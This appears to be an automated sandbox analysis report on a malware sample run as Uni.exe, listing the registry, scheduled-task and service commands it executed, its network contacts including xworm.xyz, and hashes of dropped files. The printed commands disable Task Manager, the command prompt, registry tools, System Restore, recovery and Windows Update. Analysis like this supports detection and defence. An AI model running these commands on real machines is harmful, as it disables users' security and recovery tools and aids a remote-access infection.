C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /t REG_DWORD /d 0 /f

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v "fAllowToGetHelp" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowCPL" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoThemesTab" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoDispSettings" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 2 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\WinRE" /v "DisableStatusMessages" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute" /v "AutoChk" /t REG_MULTI_SZ /d "" /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /Change /TN "\Microsoft\Windows\WinRE\WinREBootIndex" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks /Change /TN "\Microsoft\Windows\WinRE\WinRECleanup" /Disable

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\sr" /v "Start" /t REG_DWORD /d 4 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\CrashControl" /v "AutoReboot" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\sc.exe

sc config wercplsupport start=disabled

C:\Windows\SysWOW64\sc.exe

sc config WerSvc start=disabled

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 xworm.xyz udp
US 198.54.114.193:443 xworm.xyz tcp
US 198.54.114.193:443 xworm.xyz tcp
US 208.95.112.1:80 ip-api.com tcp
US 147.185.221.18:59571 las-protected.gl.at.ply.gg tcp

Files

memory/3876-0-0x00007FFB7DB83000-0x00007FFB7DB85000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_euky0onc.3of.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3876-9-0x00000210DDB80000-0x00000210DDBA2000-memory.dmp

memory/3876-10-0x00007FFB7DB80000-0x00007FFB7E642000-memory.dmp

memory/3876-11-0x00007FFB7DB80000-0x00007FFB7E642000-memory.dmp

memory/3876-12-0x00007FFB7DB80000-0x00007FFB7E642000-memory.dmp

memory/3876-16-0x00007FFB7DB80000-0x00007FFB7E642000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat

MD5 011e90b162cf67f34f91d6d563859817
SHA1 30ce18995be9545ae88189bc3ff5defbd2392d11
SHA256 6cced62e6af36a52c48fdf0efb1571a44d6469f4ca66ca510020e5da407ed613
SHA512 51d47a852b27540154c8b3ccb295dae4874475bf631be931bf8a4cf271805e927162c7f01e8df7f0aea8b9a860dac3500e59208cb60440bfa8e827325be7a36d

C:\Users\Admin\AppData\Local\Temp\temp.hex

MD5 fad3aaf3015914e834a9d0313fcd371b
SHA1 a4715a153a79263436819905b87b54acae4b2227
SHA256 917674ca36b5345dccd41f4ce772c6ffe8c3054520ebd2923fba768cbee77690
SHA512 64c9bd116ad70abf9e8bf444f248915383d4b4680de1f6dadad649e0279803c9575952b0e1995a34e47c5a73eb42e23e964437a4a7828d3214f3f694383db83a

C:\Users\Admin\AppData\Local\Temp\Uni.exe

MD5 09e870076cfaa16f20be5050834ba8ff
SHA1 0b8b26cdaf08a07b8e86b1643ca23e249c8f3840
SHA256 f3fcb094f57ddd9e4c29eccc62e3ad3ce50d40230fbe0f00324ccf18acd68bc4
SHA512 d655030bf9bb84ecdd7109aab55c33976e2a2cbd63ccece48d3e881b1dd378e4e17f157a3dd9a07e8786650cbf46b8d742a115cb9906c9b69d7143c2b4de0643

memory/564-24-0x0000000000530000-0x0000000000540000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5f4c933102a824f41e258078e34165a7
SHA1 d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512 a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d405540758f0f5bdaab94f1a054cc67d
SHA1 07e307420a26d17c2dc1226af6e72018da4ae26c
SHA256 2ad4d5239f9647362dc68a96eae37de27bdd40359126715c72d79770d3d75d61
SHA512 59496f3ae411c3eda1f20335249fa6635cba06974f07b16a181271708a0d5dd078f50ef349e98e4b53643588eb77f4c56c8e2c7fb51a5c638273009ed1b7b889

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ac62bf271b94b583bcf13eef6b124fee
SHA1 7fc6c2f61155471eaaadb7da29579eb0958de3df
SHA256 8ab85c280555d6f378573edba932182d36a89f2bff7762dea01416480b2ac8f4
SHA512 7ac0a424cce85734da99afd0019d85cc12c5b77cde32a6b51e1025bf7521c7be4332850d9f6ed6035c8de09c138687b5f8b8897230c5b06ab6c1bef640155ba7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cef328ddb1ee8916e7a658919323edd8
SHA1 a676234d426917535e174f85eabe4ef8b88256a5
SHA256 a1b5b7ada8ebc910f20f91ada3991d3321104e9da598c958b1edac9f9aca0e90
SHA512 747400c20ca5b5fd1b54bc24e75e6a78f15af61df263be932d2ee7b2f34731c2de8ce03b2706954fb098c1ac36f0b761cf37e418738fa91f2a8ea78572f545cb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5794c1baef4c234203656fbbc884eee4
SHA1 b41df301d53ebe67c5027ee2e7d9cea828790f05
SHA256 7b700c984d5eec7c786dc348c669fc480f91f598fa193d1eabc398b200b2d818
SHA512 805382583ccf14e6b29584d5a813705615095723485137ed6bc618acbed07b08fb043c1b925c98d7ecd4519515d622fa0122d4f23f7f3031117437cdc676579d

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Uni.exe.log

MD5 2cbbb74b7da1f720b48ed31085cbd5b8
SHA1 79caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256 e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512 ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe

MD5 2841cd968c72817f9eef3a4bc2293d6e
SHA1 5b788259d501493a87f00deee64fa0943ab19e34
SHA256 e5a9784f523a6965622532199a42f696ca15557b473f84c12f18210085a20e95
SHA512 82eded2b67775763669452be98f7c5eeb0a3cd34f4947753fef9cedea4a1f56b49223ed7ad8e68b77e54ab2bf004e9ba22107afdc23e2e168dc60f2013907bf0

C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe

MD5 1d62aa3d19462f3d5575fc54159911b4
SHA1 b37eab86c0075245fcc517a280f0705f6dffb852
SHA256 6acaae0fb470790102a338e23dfe2263f31e529288e4efe51b34bca30371cb36
SHA512 78a9501d7920920577a586396e5d9e2278a7c926448c9a98d7844db9032dbd887df90d2f389fe1754bf5a2071a19dfd5d40315624923e903ef9ef6cbb214b1df

C:\Users\Admin\AppData\Local\Temp\reset survival.bat

MD5 ecde221cbc92ee55ae5b8c1a24e98f56
SHA1 ebda0dba4abcd3bf93183e2787cc9e5f9f1448ee
SHA256 b6fbab33e31d0a525d4c752886d812c1c46477f6314da7bde25bdc8198cb70cb
SHA512 122673ad96f1e407c75a93672f6538f342499f4e14221cbe4103c601362667487f3f33800230572e255b55e691e5068adce6336a4ffe1a651bff465d2c2d3493

memory/3212-98-0x00000000030E0000-0x0000000003116000-memory.dmp

memory/3212-99-0x0000000005DA0000-0x00000000063CA000-memory.dmp

memory/3212-101-0x0000000005B80000-0x0000000005BA2000-memory.dmp

memory/3212-106-0x0000000006440000-0x00000000064A6000-memory.dmp

memory/3212-105-0x0000000005CE0000-0x0000000005D46000-memory.dmp

memory/3212-115-0x00000000064C0000-0x0000000006817000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 050567a067ffea4eb40fe2eefebdc1ee
SHA1 6e1fb2c7a7976e0724c532449e97722787a00fec
SHA256 3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e
SHA512 341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259

memory/3212-118-0x0000000006920000-0x000000000693E000-memory.dmp

memory/3212-119-0x0000000006950000-0x000000000699C000-memory.dmp

memory/3212-120-0x0000000007900000-0x0000000007934000-memory.dmp

memory/3212-121-0x0000000075000000-0x000000007504C000-memory.dmp

memory/3212-130-0x0000000006EF0000-0x0000000006F0E000-memory.dmp

memory/3212-131-0x0000000007940000-0x00000000079E4000-memory.dmp

memory/3212-132-0x00000000082A0000-0x000000000891A000-memory.dmp

memory/3212-133-0x0000000007C60000-0x0000000007C7A000-memory.dmp

memory/3212-134-0x0000000007CF0000-0x0000000007CFA000-memory.dmp

memory/3212-135-0x0000000007EF0000-0x0000000007F86000-memory.dmp

memory/3212-136-0x0000000007E70000-0x0000000007E81000-memory.dmp

memory/3212-137-0x0000000007EB0000-0x0000000007EBE000-memory.dmp

memory/3212-138-0x0000000007EC0000-0x0000000007ED5000-memory.dmp

memory/3212-139-0x0000000007FB0000-0x0000000007FCA000-memory.dmp

memory/3212-140-0x0000000007FA0000-0x0000000007FA8000-memory.dmp